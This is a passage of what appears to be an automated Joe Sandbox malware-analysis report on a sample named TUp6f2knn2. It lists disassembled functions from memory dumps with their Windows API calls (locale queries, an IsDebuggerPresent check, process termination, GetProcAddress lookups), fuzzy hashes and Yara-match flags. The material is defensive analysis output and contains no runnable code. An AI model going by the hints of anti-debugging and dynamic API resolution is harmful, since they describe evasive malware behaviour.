IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
String ID:
API String ID: 2287132625-0
Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9

Function 0042EAE0 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON

Download Yara Rule

Strings

C, xrefs: 0042EF48, 0042ED32, 0042EBC1
C, xrefs: 0042EAFD, 0042ECA8, 0042EECC, 0042EE66, 0042ECF6, 0042EC84

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID:
String ID: C$C
API String ID: 0-238425240
Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94

Function 0256B271 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02562141: GetLastError.KERNEL32(?,?,0255A9EC,?,00000000,?,0255CDE6,0253247E,00000000,?,00451F20), ref: 02562145
Part of subcall function 02562141: _free.LIBCMT ref: 02562178
Part of subcall function 02562141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025621B9

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,02560A23,?,?,?,?,0256047A,?,00000004), ref: 0256B353
_wcschr.LIBVCRUNTIME ref: 0256B3E3
_wcschr.LIBVCRUNTIME ref: 0256B3F1
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,02560A23,00000000,02560B43), ref: 0256B494

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction ID: 1a04dd28145b3e7be72bfca684d81005e515d9ae46481c1cee0d38e31c518ac5
Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
Instruction Fuzzy Hash: 88610771B00207AAEB24AB34CC49BBA77ADFF44719F14452AE905E7580FB74E540CBA8

Function 0043B00A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
_wcschr.LIBVCRUNTIME ref: 0043B17C
_wcschr.LIBVCRUNTIME ref: 0043B18A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
String ID:
API String ID: 2444527052-0
Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9

Function 0043B3F5 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ErrorInfoLastLocale$_free
String ID:
API String ID: 2834031935-0
Opcode ID: cf5f19ddaecfef394eb322faebabd4fba94275e162a49705b2643b4bebb04734
Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
Opcode Fuzzy Hash: cf5f19ddaecfef394eb322faebabd4fba94275e162a49705b2643b4bebb04734
Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99

Function 0255A63A Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0253DAD7), ref: 0255A732
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0253DAD7), ref: 0255A73C
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0253DAD7), ref: 0255A749

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction ID: 571eab4293a94b6184e4203743afda05fe00ac0a92d647e15ee6fa4e5fabea92
Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
Instruction Fuzzy Hash: F631C77490132D9BCB21DF64DD8879CBBB8BF48710F5042EAE80CA7250EB349B858F48

Function 0042A3D3 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49

Function 025600C6 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,0256009C,00000000,00457970,0000000C,025601F3,00000000,00000002,00000000), ref: 025600E7
TerminateProcess.KERNEL32(00000000,?,0256009C,00000000,00457970,0000000C,025601F3,00000000,00000002,00000000), ref: 025600EE
ExitProcess.KERNEL32 ref: 02560100

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: 81748cb03ffc5117a2871fd4a47cc4a0382c8f0a406780f7bd52ac4b2c27372e
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: 88E0B635040149ABCF116F54DE0CA693F6AFB46B96B504124FD058B271CB36DA42DB48

Function 0042FE5F Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
ExitProcess.KERNEL32 ref: 0042FE99

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88

Function 0253092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 02530966
GetProcAddress., xrefs: 025309DC, 025309DF, 025309E4
., xrefs: 0253095F

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: d4371e20afa880c551f8aaaba41e90ae72d1e43de54e04e8705134f76b52a88e
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 153138B6900709DFDB11CF99C880AAEBBF9FF48324F15544AD841AB250D771EA45CBA8

Function 004351C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430213,?,00000004), ref: 00435213

Strings

GetLocaleInfoEx, xrefs: 004351D1, 004351DB

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
Instruction ID: 6c622d5e0ad0a6d1c05e93c1424bc95a701370efe176ef79413d4e55be9de99b
Opcode Fuzzy Hash: 64730f8190c419499ef2262387837ca1d33de23438e6729a1ee39c968f658f2e
Instruction Fuzzy Hash: 97F02B31680318BBDB016F51CC02F6F7B21EF18B02F10006BFC0567290DA799E20AADE

Function 0255ED47 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
Instruction ID: fbc1a89e6064bc46f217ce196fa1b231159ca29bb37ddd5de753f0f6a45e9c35
Opcode Fuzzy Hash: 0f0c45cb1db73e70c4158069b4bc17042fea2514ea4053169c41fd5e4a69dae0
Instruction Fuzzy Hash: 32022D71E002299FDF14CFA9C8906ADBBF1FF89314F25816AD919E7784D731AA41CB84

Function 02532605 Relevance: 3.1, APIs: 2, Instructions: 125nativewindowCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 0253262C
PostQuitMessage.USER32(00000000), ref: 025327CA

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: MessageNtdllPostProc_QuitWindow
String ID:
API String ID: 4264772764-0
Opcode ID: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction ID: e97b5890e8263d988aded45780917d0771f440ae97ee035b62f3214b49f32415
Opcode Fuzzy Hash: e934076550e84698602cd97162307a7d632c652edc7a108d85d40228a86a25f4
Instruction Fuzzy Hash: 56413D25A64384A5E731EFA5FC45B2537B0FF64722F10652AD528CB2B2E3B28940C75E

Function 02566F26 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,02566F21,?,?,00000008,?,?,0256F3E2,00000000), ref: 02567153

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: 602cc7b85e03c2716d508c8f4deaa8b411387a933f69d2d482e64a941863789e
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: 7EB13A312106099FD715CF28C48AB65BFE0FF49368F258659E89ACF2A5C335D991CF44

Function 00436CBF Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CBA,?,?,00000008,?,?,0043F17B,00000000), ref: 00436EEC

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction ID: 64e3da0580c1687aacde15a9aed21cd267913b72937e2db5c37d982a735c0e1f
Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
Instruction Fuzzy Hash: 69B17D35210609EFD714CF28C48AB657BE0FF09324F26D659E899CF2A1C339E992CB44

Function 0256B8AC Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 02562141: GetLastError.KERNEL32(?,?,0255A9EC,?,00000000,?,0255CDE6,0253247E,00000000,?,00451F20), ref: 02562145
Part of subcall function 02562141: _free.LIBCMT ref: 02562178
Part of subcall function 02562141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025621B9

Part of subcall function 02562141: _free.LIBCMT ref: 025621A0
Part of subcall function 02562141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025621AD

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0256B900

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction ID: a2df0762172b03e57f454004ed7530a77c32704349213a629c7aa03c2208cb34
Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
Instruction Fuzzy Hash: AB21BE3295020AABEF24AF24DC49BBA77ACFB40318F00017AED01E7150EB399984CB58

Function 0043B645 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B699

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ErrorLast$_free$InfoLocale
String ID:
API String ID: 2955987475-0
Opcode ID: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
Instruction ID: d046272b768734764790121d12bbe36070ecd09619f9604c2cd6a0fe40238023
Opcode Fuzzy Hash: 7810810a637c9db15668f97de096a3c7ef99c71437c6b6a4b8ea3eac9e26399b
Instruction Fuzzy Hash: B421B67251020AABDB249E65CC42BBB73A8EF48314F10107BFE01D6281EB79DD44CB99

Function 0256B534 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02562141: GetLastError.KERNEL32(?,?,0255A9EC,?,00000000,?,0255CDE6,0253247E,00000000,?,00451F20), ref: 02562145
Part of subcall function 02562141: _free.LIBCMT ref: 02562178
Part of subcall function 02562141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025621B9

EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,02560A1C,?,0256BC89,00000000,?,?,?), ref: 0256B5A6

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
Instruction ID: e30e2a2e3c48a1618744b40fa79c7d68b55538703141d88af546a595caa2fdb5
Opcode Fuzzy Hash: ffafb835184771a8fee8a968cb960d5e6389dd898606227e18ebf87d931cb5f8
Instruction Fuzzy Hash: BD11483B2007019FDB18AF39C8A57BABB92FF84318B14492CDA46D7A40E371B942CB44

Function 0043B2CD Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B3F5,00000001,00000000,?,004307B5,?,0043BA22,00000000,?,?,?), ref: 0043B33F

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
Instruction ID: 7307f244e070286786186ca11be292e9958ff85af34fd5d1bf47ea8df294ed07
Opcode Fuzzy Hash: 209f9151615a4c87f00d4ea0f4f536091c38e7646036be2875dd2bb4f2ddf691
Instruction Fuzzy Hash: D91106362007019FDB189F3988917BBB791FF84318F15452DEA8687B40D375A902C784

Function 0256BADC Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 02562141: GetLastError.KERNEL32(?,?,0255A9EC,?,00000000,?,0255CDE6,0253247E,00000000,?,00451F20), ref: 02562145
Part of subcall function 02562141: _free.LIBCMT ref: 02562178
Part of subcall function 02562141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025621B9

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0256B87A,00000000,00000000,?), ref: 0256BB08

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction ID: 6d4e77db336f819300c6a14dd29782a250b98302829c138f66722cc2611773e1
Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
Instruction Fuzzy Hash: 46F0F432A00117ABDB289A24CC4DBBABB68FB4071CF040569EC06F3154EB70BE02C6D8

Function 0043B875 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B613,00000000,00000000,?), ref: 0043B8A1

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ErrorLast$InfoLocale_free
String ID:
API String ID: 787680540-0
Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
Instruction ID: 37b951b57323e1638715454beaabcd8ff4bbdb448c8d666509202632d17d74d0
Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
Instruction Fuzzy Hash: 72F0F932910115BFDB2C6A6588057BB776CEF44764F15542FEE05A3280EB39FE4287D8

Function 0256B5CF Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 02562141: GetLastError.KERNEL32(?,?,0255A9EC,?,00000000,?,0255CDE6,0253247E,00000000,?,00451F20), ref: 02562145
Part of subcall function 02562141: _free.LIBCMT ref: 02562178
Part of subcall function 02562141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 025621B9

EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,02560A1C,?,0256BC4D,02560A1C,?,?,?,?,?,02560A1C,?,?), ref: 0256B61B

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
Instruction ID: 32f10f5c96a790fdb4460a52389c7f439bc49bd9adf04f5c4e7d49a853109f9c
Opcode Fuzzy Hash: be0c1418a5537eaa7c8022095862ccd701d6029552e7400e1215369425bfd1f6
Instruction Fuzzy Hash: 24F0CD363007055FDB246F39DC89B7ABB95FF8076CF15452DFA06DB690E7B1A8028A48

Function 0043B368 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

EnumSystemLocalesW.KERNEL32(0043B645,00000001,?,?,004307B5,?,0043B9E6,004307B5,?,?,?,?,?,004307B5,?,?), ref: 0043B3B4

Memory Dump Source

Source File: 00000000.00000002.4130251057.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TUp6f2knn2.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_free
String ID:
API String ID: 2016158738-0
Opcode ID: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
Instruction ID: e409c1f6f572afb8e53c6bef185f66c51efc5fed4ad0f11af6fa15d84cefb54f
Opcode Fuzzy Hash: ff4b281e18efaa19658e03831a8d75929bd5cd68572c305843f6b1aa6eea9166
Instruction Fuzzy Hash: 84F022362007045FDB159F3ADC91B6A7B90EF84328F15442EFE028B680D7B5AC028684

Function 02565427 Relevance: 1.5, APIs: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,0256047A,?,00000004), ref: 0256547A

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction ID: 9ef13ae380fa2b2295693dfd06f393088bb2cee3dbda48b6b2e14ad8ddd6ec12
Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
Instruction Fuzzy Hash: A6F0F631680318BBDB015F50CC05F7E7B26FF44B12F504155FC0567290EA718A20AA8D

Function 02565034 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0255E654: RtlEnterCriticalSection.NTDLL(020E0DAF), ref: 0255E663

EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 0256506C

Memory Dump Source

Source File: 00000000.00000002.4130755786.0000000002530000.00000040.00001000.00020000.00000000.sdmp, Offset: 02530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2530000_TUp6f2knn2.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
